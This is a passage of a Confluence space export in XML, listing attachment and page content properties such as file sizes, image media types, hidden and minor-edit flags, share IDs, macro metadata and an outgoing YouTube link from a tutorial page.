<property name="lowerDestinationPageTitle"><![CDATA[lay out your page (step 6 of 9)]]></property>
|
||||
<property name="destinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98314</id>
|
||||
</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
</object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262259</id>
|
||||
<property name="name"><![CDATA[FILESIZE]]></property>
|
||||
<property name="stringValue"/><property name="longValue">34478</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262258</id>
|
||||
<property name="name"><![CDATA[MEDIA_TYPE]]></property>
|
||||
<property name="stringValue"><![CDATA[image/png]]></property>
|
||||
<property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262257</id>
|
||||
<property name="name"><![CDATA[HIDDEN]]></property>
|
||||
<property name="stringValue"/><property name="longValue">0</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262256</id>
|
||||
<property name="name"><![CDATA[FILESIZE]]></property>
|
||||
<property name="stringValue"/><property name="longValue">6988</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="OutgoingLink" package="com.atlassian.confluence.links">
|
||||
<id name="id">196609</id>
|
||||
<property name="destinationPageTitle"><![CDATA[//youtu.be/RXhL9cfwx2c]]></property>
|
||||
<property name="lowerDestinationPageTitle"><![CDATA[//youtu.be/rxhl9cfwx2c]]></property>
|
||||
<property name="destinationSpaceKey"><![CDATA[https]]></property>
|
||||
<property name="lowerDestinationSpaceKey"><![CDATA[https]]></property>
|
||||
<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98314</id>
|
||||
</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
</object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262255</id>
|
||||
<property name="name"><![CDATA[HIDDEN]]></property>
|
||||
<property name="stringValue"/><property name="longValue">0</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262254</id>
|
||||
<property name="name"><![CDATA[MEDIA_TYPE]]></property>
|
||||
<property name="stringValue"><![CDATA[image/png]]></property>
|
||||
<property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262253</id>
|
||||
<property name="name"><![CDATA[FILESIZE]]></property>
|
||||
<property name="stringValue"/><property name="longValue">88136</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262252</id>
|
||||
<property name="name"><![CDATA[MEDIA_TYPE]]></property>
|
||||
<property name="stringValue"><![CDATA[image/png]]></property>
|
||||
<property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262251</id>
|
||||
<property name="name"><![CDATA[HIDDEN]]></property>
|
||||
<property name="stringValue"/><property name="longValue">0</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262250</id>
|
||||
<property name="name"><![CDATA[FILESIZE]]></property>
|
||||
<property name="stringValue"/><property name="longValue">2144</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262249</id>
|
||||
<property name="name"><![CDATA[MEDIA_TYPE]]></property>
|
||||
<property name="stringValue"><![CDATA[image/jpeg]]></property>
|
||||
<property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262248</id>
|
||||
<property name="name"><![CDATA[MINOR_EDIT]]></property>
|
||||
<property name="stringValue"/><property name="longValue">1</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262247</id>
|
||||
<property name="name"><![CDATA[FILESIZE]]></property>
|
||||
<property name="stringValue"/><property name="longValue">109868</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262246</id>
|
||||
<property name="name"><![CDATA[HIDDEN]]></property>
|
||||
<property name="stringValue"/><property name="longValue">0</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262245</id>
|
||||
<property name="name"><![CDATA[MINOR_EDIT]]></property>
|
||||
<property name="stringValue"/><property name="longValue">0</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262244</id>
|
||||
<property name="name"><![CDATA[MEDIA_TYPE]]></property>
|
||||
<property name="stringValue"><![CDATA[image/png]]></property>
|
||||
<property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262243</id>
|
||||
<property name="name"><![CDATA[MEDIA_TYPE]]></property>
|
||||
<property name="stringValue"><![CDATA[image/png]]></property>
|
||||
<property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262242</id>
|
||||
<property name="name"><![CDATA[MINOR_EDIT]]></property>
|
||||
<property name="stringValue"/><property name="longValue">0</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262241</id>
|
||||
<property name="name"><![CDATA[HIDDEN]]></property>
|
||||
<property name="stringValue"/><property name="longValue">0</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262240</id>
|
||||
<property name="name"><![CDATA[MEDIA_TYPE]]></property>
|
||||
<property name="stringValue"><![CDATA[image/jpeg]]></property>
|
||||
<property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262239</id>
|
||||
<property name="name"><![CDATA[FILESIZE]]></property>
|
||||
<property name="stringValue"/><property name="longValue">47510</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262238</id>
|
||||
<property name="name"><![CDATA[FILESIZE]]></property>
|
||||
<property name="stringValue"/><property name="longValue">3070</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262237</id>
|
||||
<property name="name"><![CDATA[MINOR_EDIT]]></property>
|
||||
<property name="stringValue"/><property name="longValue">0</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262236</id>
|
||||
<property name="name"><![CDATA[MINOR_EDIT]]></property>
|
||||
<property name="stringValue"/><property name="longValue">0</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262235</id>
|
||||
<property name="name"><![CDATA[MINOR_EDIT]]></property>
|
||||
<property name="stringValue"/><property name="longValue">0</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262234</id>
|
||||
<property name="name"><![CDATA[FILESIZE]]></property>
|
||||
<property name="stringValue"/><property name="longValue">15296</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262233</id>
|
||||
<property name="name"><![CDATA[FILESIZE]]></property>
|
||||
<property name="stringValue"/><property name="longValue">2131</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262232</id>
|
||||
<property name="name"><![CDATA[FILESIZE]]></property>
|
||||
<property name="stringValue"/><property name="longValue">9446</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262231</id>
|
||||
<property name="name"><![CDATA[MINOR_EDIT]]></property>
|
||||
<property name="stringValue"/><property name="longValue">0</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262230</id>
|
||||
<property name="name"><![CDATA[MEDIA_TYPE]]></property>
|
||||
<property name="stringValue"><![CDATA[image/jpeg]]></property>
|
||||
<property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262229</id>
|
||||
<property name="name"><![CDATA[FILESIZE]]></property>
|
||||
<property name="stringValue"/><property name="longValue">2398</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262228</id>
|
||||
<property name="name"><![CDATA[HIDDEN]]></property>
|
||||
<property name="stringValue"/><property name="longValue">0</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262227</id>
|
||||
<property name="name"><![CDATA[MINOR_EDIT]]></property>
|
||||
<property name="stringValue"/><property name="longValue">1</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262226</id>
|
||||
<property name="name"><![CDATA[MEDIA_TYPE]]></property>
|
||||
<property name="stringValue"><![CDATA[image/jpeg]]></property>
|
||||
<property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262225</id>
|
||||
<property name="name"><![CDATA[MEDIA_TYPE]]></property>
|
||||
<property name="stringValue"><![CDATA[image/jpeg]]></property>
|
||||
<property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262224</id>
|
||||
<property name="name"><![CDATA[HIDDEN]]></property>
|
||||
<property name="stringValue"/><property name="longValue">0</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262223</id>
|
||||
<property name="name"><![CDATA[MINOR_EDIT]]></property>
|
||||
<property name="stringValue"/><property name="longValue">0</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262222</id>
|
||||
<property name="name"><![CDATA[MINOR_EDIT]]></property>
|
||||
<property name="stringValue"/><property name="longValue">1</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262221</id>
|
||||
<property name="name"><![CDATA[MEDIA_TYPE]]></property>
|
||||
<property name="stringValue"><![CDATA[image/png]]></property>
|
||||
<property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262220</id>
|
||||
<property name="name"><![CDATA[MINOR_EDIT]]></property>
|
||||
<property name="stringValue"/><property name="longValue">0</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262219</id>
|
||||
<property name="name"><![CDATA[FILESIZE]]></property>
|
||||
<property name="stringValue"/><property name="longValue">7054</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262218</id>
|
||||
<property name="name"><![CDATA[HIDDEN]]></property>
|
||||
<property name="stringValue"/><property name="longValue">0</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262217</id>
|
||||
<property name="name"><![CDATA[HIDDEN]]></property>
|
||||
<property name="stringValue"/><property name="longValue">0</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262216</id>
|
||||
<property name="name"><![CDATA[MINOR_EDIT]]></property>
|
||||
<property name="stringValue"/><property name="longValue">0</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262215</id>
|
||||
<property name="name"><![CDATA[FILESIZE]]></property>
|
||||
<property name="stringValue"/><property name="longValue">12098</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262214</id>
|
||||
<property name="name"><![CDATA[FILESIZE]]></property>
|
||||
<property name="stringValue"/><property name="longValue">27998</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262213</id>
|
||||
<property name="name"><![CDATA[FILESIZE]]></property>
|
||||
<property name="stringValue"/><property name="longValue">41645</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262212</id>
|
||||
<property name="name"><![CDATA[HIDDEN]]></property>
|
||||
<property name="stringValue"/><property name="longValue">0</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262211</id>
|
||||
<property name="name"><![CDATA[MINOR_EDIT]]></property>
|
||||
<property name="stringValue"/><property name="longValue">1</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262210</id>
|
||||
<property name="name"><![CDATA[MEDIA_TYPE]]></property>
|
||||
<property name="stringValue"><![CDATA[image/png]]></property>
|
||||
<property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262209</id>
|
||||
<property name="name"><![CDATA[MINOR_EDIT]]></property>
|
||||
<property name="stringValue"/><property name="longValue">1</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262208</id>
|
||||
<property name="name"><![CDATA[MEDIA_TYPE]]></property>
|
||||
<property name="stringValue"><![CDATA[image/png]]></property>
|
||||
<property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262207</id>
|
||||
<property name="name"><![CDATA[FILESIZE]]></property>
|
||||
<property name="stringValue"/><property name="longValue">264209</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262206</id>
|
||||
<property name="name"><![CDATA[MEDIA_TYPE]]></property>
|
||||
<property name="stringValue"><![CDATA[image/jpeg]]></property>
|
||||
<property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262205</id>
|
||||
<property name="name"><![CDATA[MEDIA_TYPE]]></property>
|
||||
<property name="stringValue"><![CDATA[image/png]]></property>
|
||||
<property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262204</id>
|
||||
<property name="name"><![CDATA[FILESIZE]]></property>
|
||||
<property name="stringValue"/><property name="longValue">2398</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262203</id>
|
||||
<property name="name"><![CDATA[HIDDEN]]></property>
|
||||
<property name="stringValue"/><property name="longValue">0</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262202</id>
|
||||
<property name="name"><![CDATA[MINOR_EDIT]]></property>
|
||||
<property name="stringValue"/><property name="longValue">0</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262201</id>
|
||||
<property name="name"><![CDATA[MINOR_EDIT]]></property>
|
||||
<property name="stringValue"/><property name="longValue">1</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262200</id>
|
||||
<property name="name"><![CDATA[macro-create-events-published-for-version]]></property>
|
||||
<property name="stringValue"/><property name="longValue">8</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262199</id>
|
||||
<property name="name"><![CDATA[MINOR_EDIT]]></property>
|
||||
<property name="stringValue"/><property name="longValue">1</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262198</id>
|
||||
<property name="name"><![CDATA[FILESIZE]]></property>
|
||||
<property name="stringValue"/><property name="longValue">21488</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262197</id>
|
||||
<property name="name"><![CDATA[macroNames]]></property>
|
||||
<property name="stringValue"/><property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262196</id>
|
||||
<property name="name"><![CDATA[HIDDEN]]></property>
|
||||
<property name="stringValue"/><property name="longValue">0</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262195</id>
|
||||
<property name="name"><![CDATA[share-id]]></property>
|
||||
<property name="stringValue"><![CDATA[32b657a6-50f7-4a6a-aaea-102ce537c268]]></property>
|
||||
<property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262194</id>
|
||||
<property name="name"><![CDATA[share-id]]></property>
|
||||
<property name="stringValue"><![CDATA[c9c2e2a4-8ebc-476f-aff1-014fe92e22ec]]></property>
|
||||
<property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262193</id>
|
||||
<property name="name"><![CDATA[share-id]]></property>
|
||||
<property name="stringValue"><![CDATA[d065f4f3-da57-4410-aa7b-7ff93e59a719]]></property>
|
||||
<property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262192</id>
|
||||
<property name="name"><![CDATA[share-id]]></property>
|
||||
<property name="stringValue"><![CDATA[498beede-3b1d-477a-8d5a-3dea256d4fa2]]></property>
|
||||
<property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262191</id>
|
||||
<property name="name"><![CDATA[share-id]]></property>
|
||||
<property name="stringValue"><![CDATA[8c741dfa-dc55-4d7e-ac8c-d3aba5a29f2a]]></property>
|
||||
<property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262190</id>
|
||||
<property name="name"><![CDATA[share-id]]></property>
|
||||
<property name="stringValue"><![CDATA[9092f143-f878-4fd8-9300-7bcecd02dd02]]></property>
|
||||
<property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262189</id>
|
||||
<property name="name"><![CDATA[share-id]]></property>
|
||||
<property name="stringValue"><![CDATA[576b0d46-e5b1-4ee9-9b58-c688fc240c65]]></property>
|
||||
<property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262188</id>
|
||||
<property name="name"><![CDATA[share-id]]></property>
|
||||
<property name="stringValue"><![CDATA[c5547696-df60-4a59-96b4-355de741a34a]]></property>
|
||||
<property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262187</id>
|
||||
<property name="name"><![CDATA[share-id]]></property>
|
||||
<property name="stringValue"><![CDATA[25c3f4c7-6755-4974-aa96-0cad5b648190]]></property>
|
||||
<property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262186</id>
|
||||
<property name="name"><![CDATA[share-id]]></property>
|
||||
<property name="stringValue"><![CDATA[323e5bdf-f804-4867-920e-b006c9f2aa23]]></property>
|
||||
<property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262185</id>
|
||||
<property name="name"><![CDATA[macroNames]]></property>
|
||||
<property name="stringValue"><![CDATA[widget]]></property>
|
||||
<property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262184</id>
|
||||
<property name="name"><![CDATA[share-id]]></property>
|
||||
<property name="stringValue"><![CDATA[30ea9299-b7f7-48f4-b0b2-00d4d0b720d8]]></property>
|
||||
<property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262183</id>
|
||||
<property name="name"><![CDATA[macro-create-events-published-for-version]]></property>
|
||||
<property name="stringValue"/><property name="longValue">1</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262182</id>
|
||||
<property name="name"><![CDATA[macroNames]]></property>
|
||||
<property name="stringValue"/><property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262181</id>
|
||||
<property name="name"><![CDATA[share-id]]></property>
|
||||
<property name="stringValue"><![CDATA[79351706-62d9-47b2-902e-d7f635e020b1]]></property>
|
||||
<property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262180</id>
|
||||
<property name="name"><![CDATA[share-id]]></property>
|
||||
<property name="stringValue"><![CDATA[8c60c7b5-70b7-4d89-988a-b47459b91c6d]]></property>
|
||||
<property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262179</id>
|
||||
<property name="name"><![CDATA[share-id]]></property>
|
||||
<property name="stringValue"><![CDATA[ad00c983-c9e3-46ab-90a4-42d016a162e5]]></property>
|
||||
<property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262178</id>
|
||||
<property name="name"><![CDATA[share-id]]></property>
|
||||
<property name="stringValue"><![CDATA[aa14dd02-a368-4c44-b5a5-b997c6d519c5]]></property>
|
||||
<property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262177</id>
|
||||
<property name="name"><![CDATA[share-id]]></property>
|
||||
<property name="stringValue"><![CDATA[2c73ae66-3422-43d3-8867-b99be3fd153d]]></property>
|
||||
<property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262176</id>
|
||||
<property name="name"><![CDATA[share-id]]></property>
|
||||
<property name="stringValue"><![CDATA[b19a726e-f021-4386-a33a-cc4134368b29]]></property>
|
||||
<property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262175</id>
|
||||
<property name="name"><![CDATA[share-id]]></property>
|
||||
<property name="stringValue"><![CDATA[be8deba8-e975-4ea2-9817-94db937c8a42]]></property>
|
||||
<property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262174</id>
|
||||
<property name="name"><![CDATA[share-id]]></property>
|
||||
<property name="stringValue"><![CDATA[3c2f37c4-e102-4d53-be59-7e0ebbc80d37]]></property>
|
||||
<property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262173</id>
|
||||
<property name="name"><![CDATA[share-id]]></property>
|
||||
<property name="stringValue"><![CDATA[bdb695aa-ffc0-4544-b601-08618dfe3f43]]></property>
|
||||
<property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262172</id>
|
||||
<property name="name"><![CDATA[share-id]]></property>
|
||||
<property name="stringValue"><![CDATA[0e76d5df-8079-47bd-afe7-a90d92922657]]></property>
|
||||
<property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262171</id>
|
||||
<property name="name"><![CDATA[share-id]]></property>
|
||||
<property name="stringValue"><![CDATA[f8ae6dc9-0915-416e-bd0c-2c2aed6f19c6]]></property>
|
||||
<property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262170</id>
|
||||
<property name="name"><![CDATA[share-id]]></property>
|
||||
<property name="stringValue"><![CDATA[b41a9868-a5c0-4bd1-84c6-93910fcd12f6]]></property>
|
||||
<property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262169</id>
|
||||
<property name="name"><![CDATA[share-id]]></property>
|
||||
<property name="stringValue"><![CDATA[20018262-63f0-4469-89b6-d52cce7086b2]]></property>
|
||||
<property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262168</id>
|
||||
<property name="name"><![CDATA[share-id]]></property>
|
||||
<property name="stringValue"><![CDATA[1c198386-7ec9-48dd-a514-bbba0c4835e4]]></property>
|
||||
<property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262167</id>
|
||||
<property name="name"><![CDATA[macro-create-events-published-for-version]]></property>
|
||||
<property name="stringValue"/><property name="longValue">9</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262166</id>
|
||||
<property name="name"><![CDATA[macro-create-events-published-for-version]]></property>
|
||||
<property name="stringValue"/><property name="longValue">8</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262165</id>
|
||||
<property name="name"><![CDATA[macroNames]]></property>
|
||||
<property name="stringValue"/><property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262164</id>
|
||||
<property name="name"><![CDATA[macro-create-events-published-for-version]]></property>
|
||||
<property name="stringValue"/><property name="longValue">4</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262163</id>
|
||||
<property name="name"><![CDATA[macro-create-events-published-for-version]]></property>
|
||||
<property name="stringValue"/><property name="longValue">1</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262162</id>
|
||||
<property name="name"><![CDATA[macro-create-events-published-for-version]]></property>
|
||||
<property name="stringValue"/><property name="longValue">12</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262161</id>
|
||||
<property name="name"><![CDATA[macroNames]]></property>
|
||||
<property name="stringValue"/><property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262160</id>
|
||||
<property name="name"><![CDATA[macroNames]]></property>
|
||||
<property name="stringValue"/><property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262159</id>
|
||||
<property name="name"><![CDATA[share-id]]></property>
|
||||
<property name="stringValue"><![CDATA[97a52591-901b-4e26-b38c-23180d68189c]]></property>
|
||||
<property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262158</id>
|
||||
<property name="name"><![CDATA[macro-create-events-published-for-version]]></property>
|
||||
<property name="stringValue"/><property name="longValue">1</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262157</id>
|
||||
<property name="name"><![CDATA[share-id]]></property>
|
||||
<property name="stringValue"><![CDATA[566640c6-aa91-41f4-ba6b-7d02dc9ef2e4]]></property>
|
||||
<property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262156</id>
|
||||
<property name="name"><![CDATA[macroNames]]></property>
|
||||
<property name="stringValue"/><property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262155</id>
|
||||
<property name="name"><![CDATA[macro-create-events-published-for-version]]></property>
|
||||
<property name="stringValue"/><property name="longValue">3</property>
|
||||
<property name="dateValue"/></object>
|
||||
